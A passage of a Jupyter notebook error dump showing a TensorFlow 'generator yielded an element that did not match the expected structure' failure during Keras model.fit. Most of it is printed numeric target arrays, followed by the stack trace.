-0.03586801, 4.12411626, 0.07616146, 1.39458573, 1.54723127,
0. , 1.61366872, 2.4262607 , 3.27255727, 2.55102041,
2.03117619, 2.6119403 , 3.37806571, 0.36798528, 2.41134752,
3.83536015, 4.19296664, 3.51339482, 5.09009009, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 3.21543408,
5.70910739, 2.98313878, 1.13350126, 3.37781485, 3.61201299,
1.90555095, 3.76229158, 1.95295162, 0.65387969, 1.0521701 ,
3.44827586, 0.92470277, 1.36503743, 6.97368421, 4.68364832,
2.41014799, 0.3776752 , 4.12684622, 1.22466216, 1.92560175,
2.47131509, 4.88021295, 1.13636364, 2.78276481, 1.63355408,
1.51724138, 6.37413395]), array([ -1.19699042, -1.85247558, -4.78061559, -0.94466937,
-2.002002 , -3.58579088, -1.89133425, -0.82987552,
-4.90964882, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -0.99315068, -5.15641114,
-3.51758794, -1.25045973, -2.2411953 , -1.11550918,
-11.94404591, -0.90337785, -7.99695354, -1.64068909,
-1.79153094, -22.43485342, -1.99335548, -3.04471931,
-0.46750818, -4.63821892, -2.50354275, -2.51865672,
-0.78667284, -3.31186753, -0.80378251, -1.87090739,
-3.69702435, -3.20597277, -1.66666667, -1.69565217,
-0.99050764, -5.91420242, -0.56374675, -9.66494845,
-0.68902159, -3.94200272, -0.51880674, -3.61041142,
-0.54211843, -2.5974026 , -4.97100249, -3.8477982 ,
-1.42032845, -2.83347864, -2.41122315, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-1.18393235, -4.1963911 , -1.39009557, -5.40540541,
-1.48796499, -2.33892321, -0.88731145, -3.71503497,
-0.53859964, -4.63576159, -1.10344828, -1.61662818]), array([0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0,
1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1,
0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1,
0, 1, 0, 1, 1, 0], dtype=int64), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.33944307,
1.75994368, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 2.18319886, 5.0903901 , 3.36605891, 2.55102041,
3.92064242, 4.19776119, 3.37806571, 0.36798528, 4.96453901,
8.09167446, 6.26690712, 3.51339482, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 7.16582453,
7.92931581, 4.15045396, 4.07220823, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.65387969, 1.27137221,
3.44827586, 1.36503743, 7.39762219, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 1.92560175,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.63355408,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -0.94466937,
-4.004004 , -4.39008043, -1.89133425, -3.5615491 ,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -5.51369863, -7.59711241,
-3.6252692 , -1.25045973, -2.2411953 , -11.6588701 ,
-11.94404591, -5.1060487 , -8.6824067 , -1.64068909,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.73021749, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.69565217,
-6.76846884, -5.91420242, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-0.54211843, -6.89935065, -6.83512842, -5.04489098,
-1.42032845, -2.96425458, -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-3.46723044, -4.74192195, -2.69331017, -5.40540541,
-3.15098468, -2.33892321, -2.26264419, -3.71503497,
-3.05206463, -5.03311258, -2.06896552, -1.61662818]), array([0., 1., 1., 0., 1., 1., 0., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 1., 1., 0., 0., 1., 1.,
0., 0., 0., 1., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1.,
1., 0., 1., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 1.,
1., 1., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.9034191 ,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.84100617, 5.18553758, 3.36605891, 2.55102041,
5.52668871, 4.19776119, 3.37806571, 2.11591536, 9.26713948,
10.24321796, 6.26690712, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.21477663, 9.41662839,
9.15269597, 7.17682663, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.69747167, 1.27137221,
3.44827586, 7.39762219, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -2.93522267,
-4.8048048 , -4.39008043, -4.09215956, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -6.63282572, -7.94520548, -7.70024063,
-3.6252692 , -1.25045973, -12.66453219, -11.6588701 ,
-13.34289813, -5.81304006, -8.6824067 , -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.7826087 ,
-6.76846884, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-4.33694746, -8.72564935, -7.995029 , -5.04489098,
-1.42032845, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.20377979,
-4.01691332, -6.00083928, -2.69331017, -6.54560811,
-3.15098468, -2.78022948, -2.26264419, -5.59440559,
-3.45601436, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 0., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 2.21616093, 5.67500881,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.93592786, 5.18553758, 4.44132772, 3.61781076,
5.52668871, 4.19776119, 6.94123091, 8.41766329, 11.44208038,
23.52666043, 19.07123535, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.29575022, 3.47938144, 13.87230133,
15.67739012, 10.37613489, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.52996005, 0.69747167, 6.9267865 ,
14.10658307, 12.19726993, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.36624776, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -3.09868643, -6.58153242, -3.74493927,
-6.94027361, -7.77479893, -5.36451169, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -3.26086957,
-6.56934307, -9.13705584, -8.04794521, -7.70024063,
-11.88083274, -9.709452 , -14.05193881, -13.70996761,
-13.98852224, -25.17674784, -27.45620716, -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -8.56521739,
-13.20676847, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.82144401, -5.58354324,
-7.38115096, -9.86201299, -7.995029 , -7.6528431 ,
-4.12782956, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -7.97041906,
-5.28541226, -7.13386488, -3.8662033 , -6.96790541,
-3.58862144, -4.67784643, -4.56965395, -6.90559441,
-4.39856373, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 0., 0., 0.])]).
\t [[{{node PyFunc}}]]
\t [[IteratorGetNext]] [Op:__inference_one_step_on_iterator_7596]",
"stack": "---------------------------------------------------------------------------
InvalidArgumentError Traceback (most recent call last)
Cell In[31], line 12
3 validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
5 # model.fit(train_gen,
6 # steps_per_epoch=steps_per_epoch,
7 # validation_data=val_gen,
(...)
10
11 # Then use these datasets in your model.fit call
---> 12 model.fit(train_dataset,
13 steps_per_epoch=steps_per_epoch,
14 validation_data=val_dataset,
15 validation_steps=validation_steps,
16 epochs=1000)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\eager\\execute.py:53, in quick_execute(op_name, num_outputs, inputs, attrs, ctx, name)
51 try:
52 ctx.ensure_initialized()
---> 53 tensors = pywrap_tfe.TFE_Py_Execute(ctx._handle, device_name, op_name,
54 inputs, attrs, num_outputs)
55 except core._NotOkStatusException as e:
56 if name is not None:
InvalidArgumentError: Graph execution error:
Detected at node PyFunc defined at (most recent call last):
<stack traces unavailable>
TypeError: `generator` yielded an element that did not match the expected structure. The expected structure was (tf.float32, (tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32)), but the yielded element was (array([[-0.39491499, -0.40790701, -0.37860123, ..., 0. ,
0. , 0. ],
[-0.387636 , -0.40270658, -0.36623326, ..., 0. ,
0. , 0. ],
[-0.37878316, -0.3817255 , -0.36090224, ..., 0. ,
0. , 0. ],
...,
[-0.52475656, -0.52626182, -0.50974435, ..., 0. ,
0. , 0. ],
[-0.51747756, -0.52410992, -0.52168584, ..., 0. ,
0. , 0. ],
[-0.5349865 , -0.54096651, -0.52360501, ..., 0. ,
0. , 0. ]]), [array([ 1.88098495, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 0.48143054, 3.14661134, 0.27275827, 1.09270356,
1.1967617 , 1.36746143, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 0.57430007, 4.045605 , 0. , 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 1.39458573, 1.54723127,
0. , 1.61366872, 2.4262607 , 3.27255727, 2.55102041,
2.03117619, 2.6119403 , 3.37806571, 0.36798528, 2.41134752,
3.83536015, 4.19296664, 3.51339482, 5.09009009, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 3.21543408,
5.70910739, 2.98313878, 1.13350126, 3.37781485, 3.61201299,
1.90555095, 3.76229158, 1.95295162, 0.65387969, 1.0521701 ,
3.44827586, 0.92470277, 1.36503743, 6.97368421, 4.68364832,
2.41014799, 0.3776752 , 4.12684622, 1.22466216, 1.92560175,
2.47131509, 4.88021295, 1.13636364, 2.78276481, 1.63355408,
1.51724138, 6.37413395]), array([ -1.19699042, -1.85247558, -4.78061559, -0.94466937,
-2.002002 , -3.58579088, -1.89133425, -0.82987552,
-4.90964882, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -0.99315068, -5.15641114,
-3.51758794, -1.25045973, -2.2411953 , -1.11550918,
-11.94404591, -0.90337785, -7.99695354, -1.64068909,
-1.79153094, -22.43485342, -1.99335548, -3.04471931,
-0.46750818, -4.63821892, -2.50354275, -2.51865672,
-0.78667284, -3.31186753, -0.80378251, -1.87090739,
-3.69702435, -3.20597277, -1.66666667, -1.69565217,
-0.99050764, -5.91420242, -0.56374675, -9.66494845,
-0.68902159, -3.94200272, -0.51880674, -3.61041142,
-0.54211843, -2.5974026 , -4.97100249, -3.8477982 ,
-1.42032845, -2.83347864, -2.41122315, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-1.18393235, -4.1963911 , -1.39009557, -5.40540541,
-1.48796499, -2.33892321, -0.88731145, -3.71503497,
-0.53859964, -4.63576159, -1.10344828, -1.61662818]), array([0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0,
1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1,
0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1,
0, 1, 0, 1, 1, 0], dtype=int64), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.33944307,
1.75994368, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 2.18319886, 5.0903901 , 3.36605891, 2.55102041,
3.92064242, 4.19776119, 3.37806571, 0.36798528, 4.96453901,
8.09167446, 6.26690712, 3.51339482, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 7.16582453,
7.92931581, 4.15045396, 4.07220823, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.65387969, 1.27137221,
3.44827586, 1.36503743, 7.39762219, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 1.92560175,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.63355408,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -0.94466937,
-4.004004 , -4.39008043, -1.89133425, -3.5615491 ,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -5.51369863, -7.59711241,
-3.6252692 , -1.25045973, -2.2411953 , -11.6588701 ,
-11.94404591, -5.1060487 , -8.6824067 , -1.64068909,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.73021749, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.69565217,
-6.76846884, -5.91420242, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-0.54211843, -6.89935065, -6.83512842, -5.04489098,
-1.42032845, -2.96425458, -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-3.46723044, -4.74192195, -2.69331017, -5.40540541,
-3.15098468, -2.33892321, -2.26264419, -3.71503497,
-3.05206463, -5.03311258, -2.06896552, -1.61662818]), array([0., 1., 1., 0., 1., 1., 0., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 1., 1., 0., 0., 1., 1.,
0., 0., 0., 1., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1.,
1., 0., 1., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 1.,
1., 1., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.9034191 ,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.84100617, 5.18553758, 3.36605891, 2.55102041,
5.52668871, 4.19776119, 3.37806571, 2.11591536, 9.26713948,
10.24321796, 6.26690712, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.21477663, 9.41662839,
9.15269597, 7.17682663, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.69747167, 1.27137221,
3.44827586, 7.39762219, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -2.93522267,
-4.8048048 , -4.39008043, -4.09215956, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -6.63282572, -7.94520548, -7.70024063,
-3.6252692 , -1.25045973, -12.66453219, -11.6588701 ,
-13.34289813, -5.81304006, -8.6824067 , -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.7826087 ,
-6.76846884, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-4.33694746, -8.72564935, -7.995029 , -5.04489098,
-1.42032845, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.20377979,
-4.01691332, -6.00083928, -2.69331017, -6.54560811,
-3.15098468, -2.78022948, -2.26264419, -5.59440559,
-3.45601436, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 0., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 2.21616093, 5.67500881,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.93592786, 5.18553758, 4.44132772, 3.61781076,
5.52668871, 4.19776119, 6.94123091, 8.41766329, 11.44208038,
23.52666043, 19.07123535, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.29575022, 3.47938144, 13.87230133,
15.67739012, 10.37613489, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.52996005, 0.69747167, 6.9267865 ,
14.10658307, 12.19726993, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.36624776, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -3.09868643, -6.58153242, -3.74493927,
-6.94027361, -7.77479893, -5.36451169, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -3.26086957,
-6.56934307, -9.13705584, -8.04794521, -7.70024063,
-11.88083274, -9.709452 , -14.05193881, -13.70996761,
-13.98852224, -25.17674784, -27.45620716, -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -8.56521739,
-13.20676847, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.82144401, -5.58354324,
-7.38115096, -9.86201299, -7.995029 , -7.6528431 ,
-4.12782956, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -7.97041906,
-5.28541226, -7.13386488, -3.8662033 , -6.96790541,
-3.58862144, -4.67784643, -4.56965395, -6.90559441,
-4.39856373, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 0., 0., 0.])]).
Traceback (most recent call last):
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py\", line 204, in generator_py_func
flattened_values = nest.flatten_up_to(output_types, values)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\util\
est.py\", line 237, in flatten_up_to
return nest_util.flatten_up_to(
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1541, in flatten_up_to
return _tf_data_flatten_up_to(shallow_tree, input_tree)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1570, in _tf_data_flatten_up_to
_tf_data_assert_shallow_structure(shallow_tree, input_tree)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1444, in _tf_data_assert_shallow_structure
_tf_data_assert_shallow_structure(
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\util\
est_util.py\", line 1414, in _tf_data_assert_shallow_structure
raise TypeError(
TypeError: If shallow structure is a sequence, input must also be a sequence. Input has type: 'list'.
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\ops\\script_ops.py\", line 270, in __call__
ret = func(*args)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\autograph\\impl\\api.py\", line 643, in wrapper
return func(*args, **kwargs)
File \"c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\tensorflow\\python\\data\\ops\\from_generator_op.py\", line 206, in generator_py_func
raise TypeError(
TypeError: `generator` yielded an element that did not match the expected structure. The expected structure was (tf.float32, (tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32, tf.float32)), but the yielded element was (array([[-0.39491499, -0.40790701, -0.37860123, ..., 0. ,
0. , 0. ],
[-0.387636 , -0.40270658, -0.36623326, ..., 0. ,
0. , 0. ],
[-0.37878316, -0.3817255 , -0.36090224, ..., 0. ,
0. , 0. ],
...,
[-0.52475656, -0.52626182, -0.50974435, ..., 0. ,
0. , 0. ],
[-0.51747756, -0.52410992, -0.52168584, ..., 0. ,
0. , 0. ],
[-0.5349865 , -0.54096651, -0.52360501, ..., 0. ,
0. , 0. ]]), [array([ 1.88098495, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 0.48143054, 3.14661134, 0.27275827, 1.09270356,
1.1967617 , 1.36746143, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 0.57430007, 4.045605 , 0. , 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 1.39458573, 1.54723127,
0. , 1.61366872, 2.4262607 , 3.27255727, 2.55102041,
2.03117619, 2.6119403 , 3.37806571, 0.36798528, 2.41134752,
3.83536015, 4.19296664, 3.51339482, 5.09009009, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 3.21543408,
5.70910739, 2.98313878, 1.13350126, 3.37781485, 3.61201299,
1.90555095, 3.76229158, 1.95295162, 0.65387969, 1.0521701 ,
3.44827586, 0.92470277, 1.36503743, 6.97368421, 4.68364832,
2.41014799, 0.3776752 , 4.12684622, 1.22466216, 1.92560175,
2.47131509, 4.88021295, 1.13636364, 2.78276481, 1.63355408,
1.51724138, 6.37413395]), array([ -1.19699042, -1.85247558, -4.78061559, -0.94466937,
-2.002002 , -3.58579088, -1.89133425, -0.82987552,
-4.90964882, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -0.99315068, -5.15641114,
-3.51758794, -1.25045973, -2.2411953 , -1.11550918,
-11.94404591, -0.90337785, -7.99695354, -1.64068909,
-1.79153094, -22.43485342, -1.99335548, -3.04471931,
-0.46750818, -4.63821892, -2.50354275, -2.51865672,
-0.78667284, -3.31186753, -0.80378251, -1.87090739,
-3.69702435, -3.20597277, -1.66666667, -1.69565217,
-0.99050764, -5.91420242, -0.56374675, -9.66494845,
-0.68902159, -3.94200272, -0.51880674, -3.61041142,
-0.54211843, -2.5974026 , -4.97100249, -3.8477982 ,
-1.42032845, -2.83347864, -2.41122315, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-1.18393235, -4.1963911 , -1.39009557, -5.40540541,
-1.48796499, -2.33892321, -0.88731145, -3.71503497,
-0.53859964, -4.63576159, -1.10344828, -1.61662818]), array([0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 1, 0,
1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 1,
0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1,
0, 1, 0, 1, 1, 0], dtype=int64), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.33944307,
1.75994368, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 2.18319886, 5.0903901 , 3.36605891, 2.55102041,
3.92064242, 4.19776119, 3.37806571, 0.36798528, 4.96453901,
8.09167446, 6.26690712, 3.51339482, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.04295533, 7.16582453,
7.92931581, 4.15045396, 4.07220823, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.65387969, 1.27137221,
3.44827586, 1.36503743, 7.39762219, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 1.92560175,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.63355408,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -0.94466937,
-4.004004 , -4.39008043, -1.89133425, -3.5615491 ,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -2.43654822, -5.51369863, -7.59711241,
-3.6252692 , -1.25045973, -2.2411953 , -11.6588701 ,
-11.94404591, -5.1060487 , -8.6824067 , -1.64068909,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.73021749, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.69565217,
-6.76846884, -5.91420242, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-0.54211843, -6.89935065, -6.83512842, -5.04489098,
-1.42032845, -2.96425458, -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.03944125,
-3.46723044, -4.74192195, -2.69331017, -5.40540541,
-3.15098468, -2.33892321, -2.26264419, -3.71503497,
-3.05206463, -5.03311258, -2.06896552, -1.61662818]), array([0., 1., 1., 0., 1., 1., 0., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 0., 1., 1., 1., 1., 0., 1., 1., 0., 0., 1., 1., 0., 0., 1., 1.,
0., 0., 0., 1., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1.,
